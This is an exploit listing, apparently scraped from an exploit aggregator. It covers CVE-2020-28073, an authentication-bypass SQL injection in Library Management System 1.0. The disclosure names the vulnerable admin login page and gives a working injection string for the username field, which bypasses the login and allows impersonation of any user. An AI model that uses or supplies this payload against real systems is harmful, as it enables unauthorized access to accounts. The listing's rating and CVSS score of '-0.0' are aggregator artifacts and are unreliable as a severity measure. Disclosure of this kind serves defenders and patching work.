Exploit for Library Management System 1.0 SQL Injection CVE-2020-28073

Name: Exploit for Library Management System 1.0 SQL Injection CVE-2020-28073
Rating: 5 (183 reviews)

2020-12-17 | CVSS -0.0

## https://sploitus.com/exploit?id=PACKETSTORM:160606
# Exploit Title: Authentication Bypass via SQL injection on Library Management System   
# Date: 23/10/2020  
# Exploit Author: Valerio Alessandroni  
# Vendor Homepage: https://www.sourcecodester.com  
# Software Link: https://www.sourcecodester.com/php/14545/online-library-management-system-phpmysqli-f ull-source-code-2020.html  
# Version: 1.0  
# Tested on: ubuntu 18.04  
# CVE : CVE-2020-28073  
# Description:  
  
SQL injection on Library Management System v1.0 allows a potentially attacker to bypass the user authentication and impersonificate every user on the system.  
  
# Reproduction:  
  
- Go to login page (http://127.0.0.1/Library/Admin/adminlogin.php) and try to bypass login.  
  
username: testuser' AND 1=1;-- - password: RandomlyText